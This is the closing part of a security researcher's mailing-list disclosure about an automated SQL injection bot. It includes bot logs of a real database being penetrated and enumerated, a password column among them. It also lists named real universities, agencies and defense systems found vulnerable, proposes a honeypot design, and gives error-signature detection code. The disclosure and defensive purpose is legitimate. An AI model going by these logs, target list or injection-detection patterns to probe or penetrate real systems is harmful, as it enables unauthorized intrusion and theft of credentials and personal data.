20091128125543 [ VLNCONN ] Going processing level: 0x25
20091128125543 [ VLNCONN ] Running primary query element scan...
20091128125543 [ VLNCONN ] BaseQuery column extracted:
hp_support_reg_AU.sPassword
20091128125556 [ VLNCONN ] Going processing level: 0x26
20091128125556 [ VLNCONN ] Validating query item count...
20091128125556 [ VLNCONN ] Validation Succeeded
20091128125556 [ VLNCONN ] Validating Mode2DatAccess...
20091128125557 [ VLNCONN ] Mode2DatAccess Enabled
20091128125557 [ VLNCONN ] Going processing level: 0x3A
20091128125557 [ VLNCONN ] Scanning global DB Names ...
20091128125557 [ VLNCONN ] DB #000: hp
20091128125558 [ VLNCONN ] Accessible
20091128125558 [ VLNCONN ] DB #001: master
20091128125558 [ VLNCONN ] Accessible
20091128125559 [ VLNCONN ] DB #002: tempdb
20091128125559 [ VLNCONN ] Accessible
20091128125600 [ VLNCONN ] DB #003: model
20091128125600 [ VLNCONN ] Accessible
20091128125601 [ VLNCONN ] DB #004: msdb
20091128125602 [ VLNCONN ] Accessible
20091128125602 [ VLNCONN ] DB #005: pubs
20091128125602 [ VLNCONN ] Accessible
20091128125603 [ VLNCONN ] DB #006: Northwind
20091128125603 [ VLNCONN ] Accessible
20091128125604 [ VLNCONN ] DB #007: intel_collateral
20091128125604 [ VLNCONN ] Accessible
20091128125605 [ VLNCONN ] DB #008: vishay
20091128125605 [ VLNCONN ] Accessible
20091128125605 [ VLNCONN ] DB #009: milieu
20091128125606 [ VLNCONN ] Accessible
20091128125607 [ VLNCONN ] DB #010: seagate
20091128125608 [ VLNCONN ] Accessible
20091128125608 [ VLNCONN ] DB #011: dbSanDisk
20091128125608 [ VLNCONN ] Accessible
20091128125609 [ VLNCONN ] DB #012: hp
20091128125610 [ VLNCONN ] Accessible
20091128125610 [ VLNCONN ] DB #013: dbInFocus
20091128125612 [ VLNCONN ] Accessible
20091128125612 [ VLNCONN ] DB #014: intel
20091128125613 [ VLNCONN ] Accessible
20091128125613 [ VLNCONN ] DB #015: BMC
20091128125614 [ VLNCONN ] Accessible
20091128125614 [ VLNCONN ] DB #016: dbInFocusPP
20091128125614 [ VLNCONN ] Accessible
20091128125615 [ VLNCONN ] DB #017: dbInFocusSC
20091128125615 [ VLNCONN ] Accessible
20091128125616 [ VLNCONN ] DB #018: snc
20091128125619 [ VLNCONN ] Accessible
20091128125619 [ VLNCONN ] DB #019: SANDISK_POP
20091128125620 [ VLNCONN ] Accessible
20091128125620 [ VLNCONN ] DB #020: dbIntel
20091128125620 [ VLNCONN ] Accessible
20091128125621 [ VLNCONN ] DB #021: Nokia
20091128125621 [ VLNCONN ] Accessible
20091128125622 [ VLNCONN ] DB #022: dbShowcase
20091128125623 [ VLNCONN ] Accessible
20091128125624 [ VLNCONN ] DB #023: dbPMG
20091128125624 [ VLNCONN ] Accessible
20091128125625 [ VLNCONN ] DB #024: AMD
20091128125625 [ VLNCONN ] Accessible
20091128125625 [ VLNCONN ] DB #025: Purina
20091128125627 [ VLNCONN ] Accessible
20091128125627 [ VLNCONN ] DB #026: AMD_TEST
20091128125628 [ VLNCONN ] Accessible
20091128125628 [ VLNCONN ] DB #027: TEST_dbInFocusSC
20091128125629 [ VLNCONN ] Accessible
20091128125629 [ VLNCONN ] DB #028: TEST_InFocus
20091128125630 [ VLNCONN ] Accessible
20091128125631 [ VLNCONN ] DB #029: STB
20091128125631 [ VLNCONN ] Accessible
20091128125631 [ VLNCONN ] DB #030: BackupAwareness
20091128125632 [ VLNCONN ] Accessible
20091128125632 [ VLNCONN ] DB #031: nvpc
20091128125633 [ VLNCONN ] Accessible
20091128125633 [ VLNCONN ] DB #032: dbCisco
20091128125634 [ VLNCONN ] Accessible
20091128125634 [ VLNCONN ] DB #033: tUserLogin_bak161105
20091128125635 [ VLNCONN ] Accessible
20091128125635 [ VLNCONN ] DB #034: jackson
20091128125635 [ VLNCONN ] Accessible
20091128125636 [ VLNCONN ] DB #035: Michelin
20091128125639 [ VLNCONN ] Accessible
20091128125640 [ VLNCONN ] DB #036: dbMcAfee
20091128125640 [ VLNCONN ] Accessible
20091128125641 [ VLNCONN ] DB #037: PMG_VA
20091128125641 [ VLNCONN ] Accessible
20091128125641 [ VLNCONN ] DB #038: MCSoptimizer
20091128125642 [ VLNCONN ] Accessible
20091128125642 [ VLNCONN ] DB #039: Maxtor
20091128125643 [ VLNCONN ] Accessible
20091128125644 [ VLNCONN ] DB #040: Xtentia
20091128125645 [ VLNCONN ] Accessible
20091128125645 [ VLNCONN ] DB #041: NokiaLetsNetwork
20091128125646 [ VLNCONN ] Accessible
20091128125646 [ VLNCONN ] DB #042: Print_Optimizer
20091128125646 [ VLNCONN ] Accessible
20091128125647 [ VLNCONN ] DB #043: GiftShop
20091128125647 [ VLNCONN ] Accessible
20091128125648 [ VLNCONN ] DB #044: GiftShop_en
20091128125648 [ VLNCONN ] Accessible
20091128125648 [ VLNCONN ] DB #045: dbOrderingTool
20091128125649 [ VLNCONN ] Accessible
20091128125649 [ VLNCONN ] DB #046: SingHealth
20091128125650 [ VLNCONN ] Accessible
20091128125650 [ VLNCONN ] DB #047: Watson_Wyatt
20091128125651 [ VLNCONN ] Accessible
20091128125651 [ VLNCONN ] DB #048: VATest
20091128125652 [ VLNCONN ] Accessible
20091128125652 [ VLNCONN ] DB #049: seagate_sdvr
20091128125653 [ VLNCONN ] Accessible
20091128125653 [ VLNCONN ] DB #050: HM
20091128125653 [ VLNCONN ] Accessible
20091128125654 [ VLNCONN ] DB #051: dbVirtualAgency
20091128125654 [ VLNCONN ] Accessible
20091128125655 [ VLNCONN ] DB #052: Seagate_Xmas
20091128125655 [ VLNCONN ] Accessible
20091128125657 [ VLNCONN ] DB #053: Seagate_CNY
20091128125657 [ VLNCONN ] Accessible
20091128125658 [ VLNCONN ] DB #054: SeagateCM2
20091128125658 [ VLNCONN ] Accessible
20091128125658 [ VLNCONN ] DB #055: SeagateSecuTecheInvite
20091128125659 [ VLNCONN ] Accessible
20091128125659 [ VLNCONN ] DB #056: ICG
20091128125700 [ VLNCONN ] Accessible
20091128125700 [ VLNCONN ] DB #057: SeagateCM2_China
20091128125701 [ VLNCONN ] Accessible
20091128125701 [ VLNCONN ] DB #058: IntelServerConfig
20091128125702 [ VLNCONN ] Accessible
20091128125702 [ VLNCONN ] DB #059: SeagateCM2_Korea
20091128125703 [ VLNCONN ] Accessible
20091128125704 [ VLNCONN ] DB #060: IntelServerConfigTest
20091128125704 [ VLNCONN ] Accessible
20091128125705 [ VLNCONN ] DB #061: SeagateCM2_Taiwan
20091128125705 [ VLNCONN ] Accessible
20091128125706 [ VLNCONN ] DB #062: SeagateCMS
20091128125706 [ VLNCONN ] Accessible
20091128125707 [ VLNCONN ] DB #063: dbNSNCafe
20091128125707 [ VLNCONN ] Accessible
20091128125707 [ VLNCONN ] DB #064: SCMS_XDB
20091128125708 [ VLNCONN ] Accessible
20091128125708 [ VLNCONN ] DB #065: SCMS_AU
20091128125709 [ VLNCONN ] Accessible
20091128125710 [ VLNCONN ] Scan done -> 66 total DBs found
20091128125710 [ VLNCONN ] 59 accessible DBs found
20091128125710 [ SEG2 ] Vuln Connection Done.
Well...
Uhmmm....
Ok.
What the F**K is going on...
Bringing back FF, locating manually the 2nd entrypoint specified in the
Bot's logs and ... It seems that it's the "Forgotten Password" interface -
the very same FORM that the Code penetrated the system through before. A
manual injection -> not a single MSSQL error. Maybe it's within some hidden
text area or in the background color - anything that I could have missed.
Nope.
The HTML source is clear. Not a single ASP db-error string.
Now, this is the moment I guess a programmer lives for :)
To feel weak and stupid in front of the code you have just written.
It seems that, after all, one can learn new tricks from one's own code.
After a quick debugging session, watching the code run through the
vulnerability matching steps, the case was solved.
The reason the code could successfully penetrate the system while I
couldn't was a bug (oh yeah...) that I left in the Bot's HTML parser. The
parser implementation, adopted from one of my previous projects (the OGame
robot), did not apply the rule to properly skip any HTML code inside
comment sequences. Actually, the rule was coded in, but a minor true/false
logic bug prevented it from executing.
The vulnerable "forgotten password" FORM was indeed vulnerable. But not the
one rendered by the browser.
The one tracked and targeted by the code was also a "forgotten password"
interface, but it had a different FORM 'action' URL-path parameter and lay
entirely within one of the HTML commented-out areas. It seems that some web
programmer with a really sharp sense of humour patched the earlier
vulnerable interface and gave it a new 'action' param path leading to new,
secure interface code - but not only didn't remove the other vulnerable
interface from the server-side ASP code, he also left the old vulnerable
FORM, leading directly to that remote interface, merely commented out
within the HTML.
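The parser fix amounts to discarding commented-out HTML before enumerating
FORMs, so the parser sees what a browser renders - which, ironically, would
have hidden this still-live entrypoint from the Bot. A minimal sketch (my
own regex approach, not the Bot's actual code):

```python
import re

# Remove <!-- ... --> regions, including multi-line ones, before parsing.
COMMENT_RE = re.compile(r"<!--.*?-->", re.DOTALL)

def strip_comments(html: str) -> str:
    """Drop commented-out markup so dead FORMs are never targeted."""
    return COMMENT_RE.sub("", html)

html = """
<form action="/pwd_new.asp"><input name="email"></form>
<!-- old interface, 'hidden' by commenting out the FORM:
<form action="/pwd_old.asp"><input name="email"></form>
-->
"""
live = strip_comments(html)
assert "/pwd_new.asp" in live
assert "/pwd_old.asp" not in live   # the commented FORM no longer gets parsed
```

Of course, as this case shows, a commented-out FORM can still point at live
server-side code - the comment only hides it from browsers.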
Anyway. A buggy bot code helped the S2 penetration code find a completely
different application bug.
You simply LIVE FOR these tiny, ironic moments.
20. SIDECAM Robots vs. Honeypots And Attack Vector Recognition
//////////////////////////////////////////////////////////////
Every time an attack vector evolves, one can design and implement a proper
diversion/IDS facility - a honeypot.
Now, since I was focused in general on the ID theft attack scenario driven
by SQL Injection based mailbox credential matching, one could construct a
solution trained to recognize such an attack in progress, track its
propagation and, with some luck, tell us something more about the remote
entity that originated the attack and/or actively exploits the stolen data.
For a specialized SIDECAM-bot autodetection framework we would first need
to spread the smell of honey far away, ie. to be highly visible to
automated google-driven target seekers.
Proper positioning, combined with building in the most common SQL Injection
entrypoint patterns (let's narrow it down to just ASP for now) - like the
infamous "login.asp" scheme for example - plus a certain "data sensitivity
flavour" to taste good (let's say something more critical than a sperm-bank
customer database) - should do the trick.
When attracted to our phony target, the attacker's S2-equivalent code
should easily find the email/password record entries crafted and left there
by us. These mail accounts, prepared specially for attack-IDing purposes,
could then be robot-monitored by the honeypot framework - any valid mailbox
credential login would indicate a SIDECAM attack vector exploitation in
progress.
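The monitoring half of that framework could be as simple as this hedged
sketch: seed the honeypot DB with fabricated credential pairs, then flag
any later login attempt that uses one of them (all names and structure here
are my assumptions):

```python
class HoneytokenMonitor:
    """Track fabricated email/password pairs seeded into a honeypot DB;
    any authentication attempt using one signals SIDECAM-style exploitation,
    because the pair never existed anywhere except inside the honeypot."""

    def __init__(self, seeded_pairs):
        self.tokens = set(seeded_pairs)
        self.alerts = []  # (email, source_ip) of confirmed attack logins

    def on_login_attempt(self, email, password, source_ip):
        if (email, password) in self.tokens:
            # Whoever presents this pair must have harvested it from us.
            self.alerts.append((email, source_ip))
            return True
        return False

mon = HoneytokenMonitor([("jdoe@example.com", "hunter2")])
assert mon.on_login_attempt("jdoe@example.com", "hunter2", "203.0.113.7")
assert not mon.on_login_attempt("real@user.net", "pass", "198.51.100.2")
```

Hooked into the mail provider's login path, each alert pins down both the
fact of exploitation and the source address using the stolen data.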
21. Compromised
///////////////
The list below contains selected, non-detailed, most critical vulnerable
institutions' systems identified by the Bot during the whole research, in
some cases opening penetration paths into several different organizations'
/ companies' systems.
Some of them might have been patched since the initial vulnerability match,
some might have been shut down.
For the reasons mentioned in the first paragraph, neither links nor any
further details will be disclosed publicly.
Vulnerable educational organization systems:
- University of South Carolina, (multiple entrypoints)
- Bulgarian Svishtov Economic University,
- Cracow Jagiellonian University, medical sciences department system
- California State University, student health web service
- University of Washington,
- University of Minnesota,
- Truman State University, (multiple entrypoints)
- Hunter College,
- Dallas Baptist University, graduate admissions system
- University of Arkansas for Medical Sciences
- Association for Information Systems database
Vulnerable government institution systems:
- Argentina Ministry of Foreign Affairs system,
- UK Vehicle Certification Agency system,
- UK Vehicle & Operator Services Agency system,
- Arizona Department of Transportation system,
- California Department of General Services, Online Fiscal Services system
- California Department of Education system,
- California Tax Education Council system,
- California Department of Justice (3 separate systems)
- Florida Department of Financial services system
- Colorado Department of Personnel and Administration system
- Maryland Information Technology Advisory Council system,
- District of Columbia Public Service Commission (multiple penetration
entrypoints)
- Arizona Information Technology Agency system,
- U.S. Department of Transportation maritime service system,
- Texas Department of Justice system,
- Federal Mediation & Conciliation Service,
- Alberta (Canada) Advanced Education and Technology service,
- Georgia gov-job portal database,
- Georgia Financing and Investment Commission system,
- City of Grove City (Ohio), contractor application database,
- Geary County (Kansas) Gov Taxing web service,
- Sarpy County (Nebraska),
- Sawyer County, electronic taxing / land administration web system,
- Fauquier County (Virginia), county's government eNotification system,
- San Bernardino County web system, Purchasing Department Administration
system,
Vulnerable US Department of Defense systems (including contractors and
subcontractors):
- Rock Island Arsenal U.S. Army database system,
- U.S. National Defense University system,
- Jacobs Dougway (DoD and NASA contractor) performance and reporting system,
- DoD Severely Injured Service Member system,
- DoD Health Services Evaluation system,
- DoD troops civilian career database ("Troops To Teach"),
- Lockheed Martin, (multiple entrypoints),
- U.S. Defense Logistics Agency system - defense fuel energy services
system,
Vulnerable Financial institution systems:
- International Monetary Fund system
- U.S. National Association of Corporate Directors system,
- American Economic Association system,
- Global Banking "employer only" job board web system,
- Employee Stock Ownership Plan database,
- Mortgage Bankers Assoc of New York system,
- American Society for Training & Development system,
- International Fund Research Corporation database,
- numerous financial advisory companies and institutions
Vulnerable security companies and organizations:
- US based international security / law enforcement / private investigation
company
- Private Investigators Portals database,
- Private detective, crime, security and software community portal database,
- Retired military officers job portal, entrypoint gives R/W access to other
800+ databases,
- Associated Security Professionals (ASP) system
Vulnerable aviation and space systems:
- German Aerospace Center subsystem,
- International aerospace company providing equipment and airline
information services,
- Canadian airline ticket centre system,
- Air Traffic Control Global Events, air traffic security conferences
database system
Vulnerable health organizations systems:
- US Department Of Health, Disaster (hurricane) response online service,
- US Department of Health and Human Services University, learning platform
participant database,
- US Center for Disease Control and Prevention (CDC),
- National Association of Clean Water Agencies / Water Environment Research
Foundation joint venture,
- International company providing validation services for pharmaceutical,
biotechnology and medical device industries,
- US nationwide drug testing services company,
- French Association of Anti-Aging and Aesthetic Medicine,
- International health recruitment database,
- Cleveland Clinic Center for Continuing Education,
Miscellaneous vulnerable systems:
- 160 million hits per month global basketball portal for player promotion
and exposure,
- A Polish commercial email/web hosting company's database,
- Rediff Portal system's database,
- an online-casino client account database,
- Computershare governance services,
- National Geographic's expeditions alliance company,
- An advertising network database system, serving 9 Billion ads on 1500+ web
sites per month,
- Fuji client eSupport database,
- Dialogic corporation (IP, wireless and video solutions) client support
database,
- Nestle corporation's database, Employee Benefit & learning subsystem,
- Australian business electronic messaging (SMS/MMS) provider,
- Event organizing and publishing company with 60+ yrs experience,
- Brazilian VoIP provider, client account database,
- International casting resource database for professional actors,
- a few web hosting companies, including small and large business clients,
- numerous dating portals, including one major dating web engine,
- recruitment companies and job portal client databases (29 systems),
including IT, health, law-enforcement and ex-military.
22. return -1
/////////////
I think there is no doubt that the process of searching for a victim,
seeking out vulnerable systems containing credit card numbers along with
their CVV2 codes, matching further system penetration entrypoints - even the
whole process of an intrusion and the subsequent system penetration - all of
it can be parametrized, mathematically described and finally automated using
two things: a programming language and a machine. I guess everybody is
familiar with the phrase "the word is stronger than the sword", right? Well,
I must say that sometimes I like to feel a DWORD is twice as strong :)
Although various "friendly" robot codes exist out there, helping us round
the clock - for example the HTTP crawlers that build Google's search index -
there are also the bad guys. Obviously, the very same automation is being
actively exploited by criminals to track down the vulnerable faster and to
exploit them quicker.
There is one more important thing to note about the whole project. As
probably everyone has already noticed :) the Bot code DOES NOT implement any
miraculous, new, 0day attack vector "discovery" - it is just a PLAIN
combination of a few human and software vulnerabilities which are probably
as old as the internet itself (password reuse, email credential matching,
script engine code injection). There are HUNDREDS of more advanced and more
sophisticated automated and semi-automated tools and scripts, each of them
probably doing its job better than any single part (segment) of the Bot
alone. The main target of this research was, however, FULL automation, i.e.
binding all the "penetration phases" together and limiting the human factor
in the seek-probe-penetrate-analyse sequence as much as possible.
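The seek-probe-penetrate-analyse sequence starts with the dumbest possible
classification step: deciding from a server's response whether a parameter
looks injectable at all. A minimal sketch of that first "probe" decision
might look like the following (the signature list, function name and
signatures themselves are my own illustration of the well-known error-based
detection idea, not the Bot's actual code):

```python
# Illustrative sketch: classify an HTTP response body by known database
# error signatures. A match suggests that unsanitized input reached the
# database layer - the trigger for the next phase in an automated chain.

SQL_ERROR_SIGNATURES = [
    "You have an error in your SQL syntax",                # MySQL
    "Unclosed quotation mark after the character string",  # MS SQL Server
    "Microsoft OLE DB Provider for SQL Server",            # classic ASP / MSSQL
    "ORA-01756",                                           # Oracle: quoted string not properly terminated
    "pg_query(): Query failed",                            # PostgreSQL via PHP
]

def looks_injectable(response_body: str) -> bool:
    """Return True if the response contains a known SQL error signature."""
    return any(sig in response_body for sig in SQL_ERROR_SIGNATURES)
```

The point is not the string matching itself but that every such decision in
the chain is this mechanical - which is exactly what makes full automation
of the whole sequence feasible.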
In my opinion, the most disturbing observation of the research is that these
results can be achieved by anyone out there who is just bored enough -
sitting at home, after or in between a daylight job, and without a budget.
The question is: what are the capabilities of a potential criminal entity
WITH a budget, unlimited research manpower and malicious goals? It would be
really shortsighted to claim that fully automated codes of this kind - but
employing a few times wider range of protocols and targeting different
server-side compromise technologies - are not already operational, and have
not been for a long time, under the control of the darker shades of the
underground.
Nevertheless, it's pretty obvious: one cannot implement PERFECT protection
for our personal secret data - each of us is the sole holder and protector
of those secrets - all we can do is EDUCATE people how to build them strong
and handle them safely. Still, I guess it would be nice to see some movement
around automated and semi-automated robot code projects implemented and
operated by white hats this time, ACTIVELY targeting the places that
seriously weaken the global information infrastructure and open up users'
personal ID information for theft.
I mean, banks are obliged to protect the money of their customers by
following specific protocols which are developed and validated externally
through appropriate audit procedures, right?
Is it then so hard to imagine an automated or semi-automated system, working
more or less like a country-wide cyber security sonar, able to pinpoint -
and instantly alert the appropriate response/tech-support organizations
about - those specific "identity data bank" web applications and systems
which CAN'T and WON'T protect our sensitive secrets: passwords, keys, CC
data and IDs?
And all because of a single programmer's flaw which, once exploited by an
attacker, compromises our electronic security instantly.
Anyway, theory is one, reality is another...
Thx and Greetz: SIN, Sl4uGh7eR, Vo0, Andrui, Mario, Rothrin.
By porkythepig.
porkythepig@...t.pl
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/